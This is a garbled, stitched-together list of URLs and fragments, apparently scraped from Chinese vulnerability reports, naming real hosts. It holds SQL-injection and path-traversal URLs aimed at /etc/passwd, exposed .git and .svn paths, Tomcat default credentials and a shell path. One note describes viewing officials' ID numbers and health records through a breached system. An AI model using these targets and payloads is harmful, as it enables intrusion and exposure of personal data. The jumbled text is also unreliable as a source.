http://sys.zafu.edu.cn:81/model/TwoGradePage/jifenbz.aspx?columnId=271 http://hzhlab.hytc.edu.cn/model/TwoGradePage/jifenbz.aspx?columnId=271 http://182.129.150.10:8001/model/TwoGradePage/jifenbz.aspx?columnId=271 http://labch.cumt.edu.cn:81/model/TwoGradePage/jifenbz.aspx?columnId=271 http://182.129.150.10:8001/model/TwoGradePage/jxkj.aspx?columnId=25 http://202.114.33.72/model/TwoGradePage/jxkj.aspx?columnId=25 http://210.43.24.201:8080/model/TwoGradePage/jxkj.aspx?columnId=25 http://hzhlab.hytc.edu.cn/model/TwoGradePage/jxkj.aspx?columnId=25 http://labch.cumt.edu.cn:81/model/TwoGradePage/jxkj.aspx?columnId=25 http://dgdz.xzit.edu.cn/model/TwoGradePage/jxkj.aspx?columnId=25 
http://www.duomai.com/index.php?a=ajax_check_email&clientid=email&email=XXXXXXX&m=siter&_=1434377421327 http://passport2.cngold.org/account/password/forgot.htm?service= http://inner.sfn.cn/ url:http://220.170.91.9:8088/manager/html user:tomcat pass:tomcat http://221.122.127.36:9090/wap/index.do http://www.bailumei.net/blm/open/pg/beautician/find_all?page=1 http://my.elong.com/me_saveAddress jdbc:mysql://192.168.5.112:3306/yiqifa_bs?useUnicode=true&characterEncoding=utf-8&autoReconnect=true&useOldAliasMetadataBehavior=true"/ jdbc:mysql://221.122.127.106:3306/gouwuke?useUnicode=true&characterEncoding=utf-8 http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=Mjk= http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=Mjkgb3JkZXIgYnkgOC0t URL:http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=MjkgYW5kIEBAVkVSU0lPTiBMSUtFICclMjAwMCUnLS0= http://lexue.yonyou.com/News.aspx?typeid=36 http://www.njgjj.com/ http://baike.anjuke.com/index.php http://adm.anjuke.com/login.action安居客大数据平台 http://www.edingtou.com/member/common/forgetpwd1 http://jhldf.ahtv.cn http://wooyun.org/bugs/wooyun-2014-065559 http://jhldf.ahtv.cn/0.php http://www2.easou.com:8080/ www2.easou.com:8080 http://**.**.**.**/extmail/cgi/index.cgi http://mhz.pw/game/SOP/01.php http://www.agrij.com/) http://61.178.243.127:8081/finance_yc/monitor/cmgkb_gk.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc/monitor/cmgkb_gk.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03/monitor/cmgkb_gk.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/monitor/cmgkb_gk.jsp?village_dm=0110004 http://221.180.22.229:8080/finance/monitor/cmgkb_gk.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/monitor/zxgk_form.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc//monitor/zxgk_form.jsp?village_dm=0106010 http://218.59.175.234:8080/finance03//monitor/zxgk_form.jsp?village_dm=0106010 
http://221.180.22.229:8080/finance//monitor/zxgk_form.jsp?village_dm=0106010 http://61.178.243.127:8081/finance_yc//monitor/zxgk_form.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/init/resource_change_list1.jsp?village_dm=0105005 http://hcnl.gov.cn:8082/finance_hc//init/resource_change_list1.jsp?village_dm=0105005 http://218.59.175.234:8080/finance03//init/resource_change_list1.jsp?village_dm=0105005 http://61.178.243.127:8081/finance_yc//init/resource_change_list1.jsp?village_dm=0105005 http://221.180.22.229:8080/finance//init/resource_change_list1.jsp?village_dm=0105005 http://124.164.240.217:8080/finance03/reports/szgk_form.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc//reports/szgk_form.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03//reports/szgk_form.jsp?village_dm=0110004 http://61.178.243.127:8081/finance_yc///reports/szgk_form.jsp?village_dm=0110004 http://221.180.22.229:8080/finance//reports/szgk_form.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/reports/szgk_form1.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc//reports/szgk_form1.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03//reports/szgk_form1.jsp?village_dm=0110004 http://61.178.243.127:8081/finance_yc///reports/szgk_form1.jsp?village_dm=0110004 http://221.180.22.229:8080/finance//reports/szgk_form1.jsp?village_dm=0110004 http://jn.qlrc.com/a.zip user:admin http://www.10010-nm.com/?zh=047104011167 http://www.10010-nm.com/?zh=047104011154 http://www.10010-nm.com:8088/ http://www.pzhb.gov.cn inurl:Regist.asp http://www.wjllzx.com/dlib/Main.asp http://www.e-zc.com:8080/dlib/Main.asp http://www.sipdsh.com/Dlib/Main.asp http://www.jjjszxx.com:8080/Main.asp http://www.jxwaez.cn/dlib/Main.asp http://g.91game.com:80/ http://222.76.243.13:90/UserReg.asp?action=AddMemberOk存在注入漏洞 http://www.dianwoba.com http://hzjj.hzga.gov.cn/Web/Files/Bgxz/aspx_20150616195734.aspx http://bjjj.baoji.gov.cn/web/Files/Bgxz/aspx_20150616194928.aspx 
www.butel.com,CDN登陆系统入口是 http://114.112.74.18/Account/Logon http://www.yiwencaifu.com/pwd http://116.1.180.114/index.php?view=newslist&cid=31存在注入漏洞 http://116.1.180.114:8081/esm/login.action存在post注入 http://www.hsyr.pudong-edu.sh.cn/ http://www.shjzzx.com/ http://www.psjm.pudong-edu.sh.cn/ http://chxx.edu.sh.cn/ http://syxx.mhedu.sh.cn/ http://webmail.xinnet.com http://webmail.xinnet.asia/ http://webmail.xinnet.asia/app/eadmin/msetnav http://webmail.xinnet.com http://www.leiphone.com/test.php www.ujipin.com/api/weixin.php?act=login_bind http://www.hggbzx.gov.cn/homeweb/index_homepage.action http://services.wifi.meituan.com/.git/config http://jc.meituan.net/.git/config http://www.bbmsa.gov.cn/admin/index.htm http://221.122.127.68/ecshop+lampp.txt http://www.gbcom.com.cn/index.aspx?cat_code=yysWLANcp www.xintai.com http://www.xintai.com http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/customtablecontent.jsp?fid=10475&fmodule_code=5700&fname=%B5%DA%B6%FE%BD%EC%C7%E5%BB%AA%B4%F3%D1%A7%D3%C5%D0%E3%BD%CC%B2%C4%C6%C0%D1%A1%A3%A81992%C4%EA%A3%A9&module_code=5705 http://dzhouse.dzwww.com//WEB-INF/classes/log4j.properties http://dzhouse.dzwww.com/WEB-INF/web.xml http://dzhouse.dzwww.com//WEB-INF/struts-confi http://wiki.dev.renren.com http://wiki.dev.renren.com/wiki/Special:Listusers http://bb.renren.com/ https://passport.renren-inc.com/ http://3g.mop.com/login.html?targetUrl=/hi/index.html http://e.lvmama.com/ebooking/ebooking/task/enquireSeatOrderTaskByVst.do?vst=true&ebkTaskId=200896 https://ssl.cec.com.cn https://ssl1.cec.com.cn www.alibaba-tw.com www.alibaba-tw.com/ http://www.alibaba-tw.com/managementcenter/ ftp://211.72.206.48/ android:configChanges="keyboardHidden|orientation android:name="lib.com.google.zxing.client.android.encode.EncodeActivity android:screenOrientation="portrait android:theme="@android:style/Theme.NoTitleBar android:windowSoftInputMode="stateAlwaysHidden android:name="com.bill99.kuaiqian.ENCODE"/ android:name="android.intent.category.DEFAULT"/ 
http://fax.sfn.cn:80/feat/MoneySell.aspx http://101.227.250.142:9003/imageCenter_tj/ http://101.227.250.142:5555/ http://oa.hbwsjd.gov.cn/ http://www.bocichina.com/boci/login/forgetPassword.jsp http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml padding:10px http://www.lxrcb.com/lxrcb.rar http://www.whjsrcb.com/web.rar http://www.bxcq.cn/bxcq/ http://www.yangguangnet.com/web/resources/css/menu.jsp www.yangguangnet.com http://61.155.152.155/ http://www.yangguangnet.com/web/cd2.jsp www.xinnet.com qinghu.gov.cn/qinghu.gov.cn.apachelog0907/tomcat/conf/ http://125.89.65.227:8081/manager/html http://photo.xitek.com:81/.svn/entries http://www.casicloud.com/capabilityListNew_v2.ht?type=2000 http://www.casicloud.com/capabilityListNew_v2.ht?type=2000 http://www.ccjdw.com/pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.jljszj.gov.cn//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.thszjz.com//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.spjdz.com///pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://218.7.239.170:81//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.csjszj.cn/pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.ccjdw.com/pkpmbs//common/MessageManageList.aspx http://www.hyjsjd.cn/pkpmbs//common/MessageManageList.aspx http://www.csjszj.cn//pkpmbs//common/MessageManageList.aspx http://218.7.239.170:81//pkpmbs//common/MessageManageList.aspx http://www.spjdz.com//pkpmbs//common/MessageManageList.aspx http://www.ccjdw.com//pkpmbs/consmodel/TBpAreaList.aspx http://www.jljszj.gov.cn//pkpmbs/consmodel/TBpAreaList.aspx http://www.thszjz.com//pkpmbs/consmodel/TBpAreaList.aspx http://www.spjdz.com//pkpmbs/consmodel/TBpAreaList.aspx http://218.7.239.170:81//pkpmbs/consmodel/TBpAreaList.aspx http://www.csjszj.cn//pkpmbs/consmodel/TBpAreaList.aspx http://www.ccjdw.com/pkpmbs/jddoc/DocRightsUserList.aspx http://www.jljszj.gov.cn//pkpmbs/jddoc/DocRightsUserList.aspx 
http://www.thszjz.com//pkpmbs/jddoc/DocRightsUserList.aspx http://www.spjdz.com//pkpmbs/jddoc/DocRightsUserList.aspx http://218.7.239.170:81//pkpmbs/jddoc/DocRightsUserList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/AccountQueryList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/AccountQueryList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/AccountQueryList.aspx http://www.thszjz.com/pkpmbs//jdmanage/AccountQueryList.aspx http://www.spjdz.com/pkpmbs//jdmanage/AccountQueryList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/CCStandLibList.aspx http://218.7.239.170:81//pkpmbs//jdmanage/CCStandLibList.aspx http://www.jljszj.gov.cn//pkpmbs//jdmanage/CCStandLibList.aspx http://www.thszjz.com//pkpmbs//jdmanage/CCStandLibList.aspx http://www.spjdz.com//pkpmbs//jdmanage/CCStandLibList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/DepartmentList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/DepartmentList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/DepartmentList.aspx http://www.thszjz.com/pkpmbs//jdmanage/DepartmentList.aspx http://www.spjdz.com/pkpmbs//jdmanage/DepartmentList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/JTdCustomList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/JTdCustomList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/JTdCustomList.aspx http://www.thszjz.com/pkpmbs//jdmanage/JTdCustomList.aspx http://www.spjdz.com/pkpmbs//jdmanage/JTdCustomList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.thszjz.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.spjdz.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/SNList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/SNList.aspx http://www.thszjz.com/pkpmbs//jdmanage/SNList.aspx http://www.spjdz.com/pkpmbs//jdmanage/SNList.aspx 
http://www.ccjdw.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJlgcsList.aspx 
http://www.thszjz.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://**.**.**/ www.jiananfinance.com/losePasswordbody http://183.61.39.187/brand/ http://183.61.39.187/sola/ http://183.61.39.187/brand/ http://183.61.39.187/sola/这个,因为上面那个目录并没有什么卵用。 http://passport.oa.com/modules/passport/signin.ashx?url=http://isux.oa.com/sola/ http://isux.oa.com/sola/upload.php http://isux.oa.com/sola/server/showPic.php http://isux.oa.com/sola/server/showPic.php http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.226.36/password/forgot.action&v=1.4 http://www.xinnet.com/mail/mail.html http://webmail.xinnet.asia/(可以是任意一个新网企业邮箱) http://webmail.xinnet.asia http://221.122.127.14:8080/ http://city.zol.com:80/bid_api/web/getDealers?bid=402880552acc07e2012acc09f7da08b8&jsoncallback=jsonp1434494827908&pid=659474311d9a63b029b0e5fd2a760b45&_=1434494829350&cid=ff8080812a881a21012a8984b2cb02a4 http://db.178.com/d3/cn/item-list/type:Belt&slot:&q:* http://db.178.com/zx2/equipment/displist/qu:1&class:1'%22&sex:all&slot:all android:name="com.igexin.download.DownloadReceiver 
android:name="android.net.conn.CONNECTIVITY_CHANGE"/ http://xiaozu.muzhiwan.com/interior http://www.schoolbest.com/individuation/Student/EnterSchool/Recruit_view.aspx http://218.108.93.206/individuation/Student/EnterSchool/Recruit_view.aspx http://218.108.24.122/individuation/Student/EnterSchool/Recruit_view.aspx http://www.zhhzx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.xkzx.org/individuation/Student/EnterSchool/Recruit_view.aspx http://www.fysez.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.jdtcxx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.fhqcxx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.chwedu.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.jianlan.com.cn/individuation/Student/EnterSchool/Recruit_view.aspx http://www.zjoubbs.com/uc_server/data/config.inc.php.bak http://naotu.baidu.com/ android:name="com.ub.main.receiver.UboxReceiver android:name="android.intent.action.BOOT_COMPLETED"/ android:name="android.intent.action.PACKAGE_REPLACED"/ android:scheme="package"/ android:name="android.intent.action.ACTION_PACKAGE_ADDED"/ android:name="com.ub.main.receiver.BaiduPushReceiver android:name="com.baidu.android.pushservice.action.MESSAGE"/ android:name="com.baidu.android.pushservice.action.RECEIVE"/ android:name="com.baidu.android.pushservice.action.notification.CLICK"/ http://slms.sport.gov.cn/index.php http://www.duocaihua.net/admin/GoodsOrders.aspx http://oa.ciming.com/defaultroot/login.jsp,此处可用猪猪侠的top500用户名进行登陆,某账号内部邮箱里泄漏北京市司法局体检信息(看到了于泓源局长身份证)、北京飞流九天科技有限公司体检信息(有CEO倪县乐身份证号和电话号码)、紫竹经营体检信息、中信地产体检信息、慈铭内部通信录(韩小红总裁联系方式,将收集数据再作成字典,肯定能跑出更多账号),还有很多其它企业体检信息! 
http://oa.ciming.com/defaultroot/public/relation/relation_include_list.jsp?moduleType=information&infoId=23444077&showAdd=0&tagName=relationObjectDIV&iframeName=relationIFrame&relationview=1 http://mail.tsmc.com.cn/ http://mail.tsmc.com.cn http://61.135.147.90:4848/login.jsf http://61.135.147.33:4848/login.jsf http://61.135.147.33:8080/shell/syscon.jsp http://sws.qqdcw.com/audit/Memberinfomanage.aspx?PageNo=1&ClassID=44&keyword=&strxxzt=&strshzt=-1 http://sws.qqdcw.com/audit/MemberInfoAudit.aspx?ID=33290&ClassID=44&States=1 http://crm.emar.com/login/forgetpswd.php?orgcode=admin&loginname=admin* http://221.122.127.5:8161/admin/connections.jsp http://oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 http://1.51.216.12/main.php http://ec.alpha.wochacha.com http://www.wooyun.org/bugs/wooyun-2015-0120022/trace/781cdd49ec2d5ce8629c466571f75701审核一下已经补充好啦,但是标题忘改了,应该是10处注入。 www.to8to.com http://www.shejiben.com/account/login.php http://www.shejiben.com/yz/3410927/ http://www.shejiben.com/sjs/998338/ http://www.shejiben.com/my/message.php?act=send&uid=1234567 http://www.shejiben.com/my/message.php?act=send&uid=1234567 http://218.31.133.92/admin/login.asp http://218.31.133.92/admin/article_list.asp?ChannelID=2&field=Editor&keyword=123 album.albumclass.list/pid/10080/top/c/c/*/1 http://221.122.127.6 http://221.122.127.7:9090/ http://fanxian.egou.com/checkEmail.do?email= http://www.homelinkhr.com/view_getPostListForCustomer.action?recruitType=DD0401&rows=9&page=1 http://weibo.cnsuning.com/ http://weibo.cnsuning.com/wap/就没有限制了 http://weibo.cnsuning.com/wap/index.php?mod=13076755 http://weibo.cnsuning.com/wap/index.php?mod=topic&code=modify&tid=1574624 http://103.255.94.252/ http://weixin.baifendian.com/ http://wiki.emar.com/ http://www.genevc.com/?m=invest&action=detail&id=740 http://www.gdaudit.gov.cn/ http://www.gdaudit.gov.cn/CVS/Entries 
http://www.gdaudit.gov.cn/userfiles/CVS/Entries http://www.gdaudit.gov.cn/system/CVS/Entries http://shoujitest.shouji.sogou.com/log.php?see=../../../../../../../../../../../../etc/passwd http://shoujitest.shouji.sogou.com/log.php?see=../../../../../../../../../../../../etc/httpd/conf/httpd.conf http://oa.fg.net.cn/index.asp http://112.124.41.23:38888/ http://oa.yf1668.com http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx?PeiXunName= http://112.124.41.23:38888/Office/GuDingJiLu.aspx?GDName= http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://112.124.41.23:38888/DocFile/DangAn.aspx?JuanKuName= http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomLinkLog.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomNeed.aspx?CustomName= http://112.124.41.23:38888/CRM/MySongYang.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomHate.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomBack.aspx?CustomName= http://112.124.41.23:38888/Supply/BuyLog.aspx?OrderName= http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx?ProjectName= http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName= http://112.124.41.23:38888/DocFile/XueXiXinDeOK.aspx http://112.124.41.23:38888/Office/GuDingJiLu.as http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://demo.magicmail.com.cn:9988/ data:text/html;base64,PHNjcmlwdD5hbGVydCgvS2V5Ym9hcmQvKTwvc2NyaXB0Pgo= http://203.91.45.154/query/queryApproveState.action?cardId=&queryType=approveState http://fanxian.egou.com http://m.fang.com/client.jsp?produce=soufunrent http://**.**.** 
http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://221.122.127.5:8161/admin/ http://221.122.127.157:8161/admin/ http://wiki.emar.com/login.action http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=10122715052788 http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=10122715052788 http://www.zqts.com/article.aspx?cid=993 http://www.xiangguo.com/find/password http://uc.wasu.cn/.git/config http://play.wasu.cn/.git/config http://v.wasu.cn/.git/config http://travel.wasu.cn/.git/config http://vip.wasu.cn/.git/config http://hzuc.wasu.cn/.git/config http://live.wasu.cn/.git/config http://all.wasu.cn/.git/config http://zhuanti.wasu.cn/.git/config http://movie.wasu.cn/.git/config http://dianshiju.wasu.cn/.git/config http://dongman.wasu.cn/.git/config http://itv.wasu.cn/.git/config http://tops.wasu.cn/.git/config http://documentary.wasu.cn/.git/config http://ent.wasu.cn/.git/config http://sports.wasu.cn/.git/config http://zixun.wasu.cn/.git/config http://news.wasu.cn/.git/config http://wdy.wasu.cn/.git/config http://edu.wasu.cn/.git/config http://discovery.wasu.cn/.git/config http://auto.wasu.cn/.git/config http://house.wasu.cn/.git/config http://clientapi.wasu.cn/.git/config http://dv.wasu.cn/.git/config http://life.wasu.cn/.git/config http://uc.wasu.cn/.git/config http://oa.fg.net.cn/index.asp http://112.124.41.23:38888/ http://oa.yf1668.com http://112.124.41.23:38888/CRM/MyCustomNeed.aspx http://112.124.41.23:38888/CRM/MySongYang.aspx http://112.124.41.23:38888/CRM/MyCustomHate.aspx http://112.124.41.23:38888/CRM/MyCustomBack.aspx http://112.124.41.23:38888/Supply/BuyLog.aspx http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName= http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName= http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName= http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName= 
http://112.124.41.23:38888/Project/ProjectJinDu.aspx http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName= http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName= http://112.124.41.23:38888/Supply/SupplysLink.aspx?GongYingShang= http://112.124.41.23:38888/Supply/SupplysLink.aspx http://112.124.41.23:38888/Supply/BuyOrder.aspx http://112.124.41.23:38888/Supply/Supplys.aspx http://112.124.41.23:38888/Sell/Contract.aspx"--dbms="mssql http://112.124.41.23:38888/Car/CarLog.aspx http://112.124.41.23:38888/DocFile/DangAn.aspx http://112.124.41.23:38888/DocFile/DangAn.aspx http://ufcsp.ufida.com.cn/xmglnet/kmp/login.asp?link=/xmglnet/ufcsp/index.asp http://www.zsezt.com/u/member/index.php?do=cossion_view&cid=7090 http://passport.pptv.com/addmessage.do http://nehrc.nhri.org.tw/toxic/toxfaq_detail.php?id=132 http://sqlmap.org http://www.yijifen.com/forgetpwd.do http://**.**.**/login.php http://119.40.53.5/ x.cn/1.js http://websms.soufun.com/login http://61.241.82.144/这个IP,看这个系统的名字就觉得高大上 http://61.241.82.144:381/upload5warn/index_bak.jsp http://61.241.82.144:2585/ http://61.241.82.144:2585/exp/ashura.jsp http://61.241.82.144:2181/WebApp/emoss/getMessages.jsp#none http://www.timber2005.com/ http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/ http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Course_Class_List_One.aspx?cid=27 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Course_Class_List_One.aspx?cid=27%20and%201=user http://pms.qmango.com/manage/login.jsp http://pms.qmango.com http://pms.qmango.com/manage/shezhi/yonghu_edit.jsp?id=9539&waibao_id=14&loupan_id=11648 http://**.**.**/System/ http://yy.xmfybj.cn/image/img27.asp http://yy.xmfybj.cn/image/cantactme.asp http://jiameng.qmango.com/ http://jiameng.qmango.com/ http://joycenter.jd.com/msgCenter/getUnreadNum.action?callback=jsonp1434548327779 http://baitiao.jd.com/ious/queryBT?callback=jsonp1434548327780 
http://giftcard.jd.com/service/getGiftCardCount.action?callback=jsonp1434548327781 http://quan.jd.com/getcouponcount.action?callback=jsonp1434548327782 http://h5.ujipin.com/.svn/entries http://wan.renren.com/bbs/plugin.php?action=../../../../../../../../../../etc/passwd%00&id=dc_mall&inajax=1 http://125.89.72.16:8080/EASPortalWebsite/login.aspx http://www.yc91.com/news_show.php?id=1506003492 http://116.55.21.152:81/Account/Login?returnUrl=%2F https://pactera.us/Platform/AdminMain/PortLogin.aspx?SysTokenRequest=5%24WQ3SpENiM7s1Hc7%2foBVa8hcJDzvemyyk3XaX6dvhVJP2xXLE13l2nklgQshlo8nVwQYPP7kvT2uad5unuafMZg7UQ3QYO1A7UG245kGof%2bURhTLj9vsbm3UkPGyeUnLjWFsPoQh6kcFoHNryHqe0gnlBaczFiMZtuVZVlQ8%2bf1MZka2FojD%2f5g%3d%3d http://bbs.rong360.com/config/config_global.php.bak http://218.90.184.158:8000/wxepi/存在注入漏洞 http://218.26.163.122:8080/SSO/loginAction!login.action;jsessionid=A45A080566E507BF721DEECB3676D5CE存在命令执行漏洞 http://zhidao.tuanche.com/question_30026/ http://218.22.2.190/index.php?controller=vodtwo&action=index&list=10 http://wooyun.org/bugs/wooyun-2015-0121224 http://webibj_s.10658.cc http://ms.clcn.net.cn:8080/sms/opac/user/getPictureAction.action?type=2&xc=5 https://ws2.singforlife.com.tw/sfl/login2A.asp http://118.144.35.112/ http://tj.ranknowcn.com/tj/recv.php?site=709&ar=1&type=1&posx=1&uid=1&imp=1&sid=-7345502201120765948&log= http://118.144.35.107/ http://118.144.35.107/System/Portal/ContentManage/WebUI/MoreInfo_List.aspx?IL_ID=9e31d24d-02ca-4a00-8a58-80a8004b83d9 http://mail.chenghua.gov.cn/extmail/cgi/index.cgi http://www.dybank.net/web.rar http://www.itpub.net/source/plugin/itpub_medal/medalimgs.tar.gz http://j1.esf.sina.com.cn/login发现是没有验证码的,也没有https加密协议的 http://www2.gdlottery.cn/user_toLogin.do存在命令执行 www2.gdlottery.cn/123.txt http://food.2626.com.tw/index.action http://ibztv.bzcm.net/msfdj/?d=48存在注入漏洞 http://ibztv.bzcm.net/live_admin/admin.php http://interface.huanqiu.com/.svn/entries http://shurufa.eastday.com/.svn/entries 
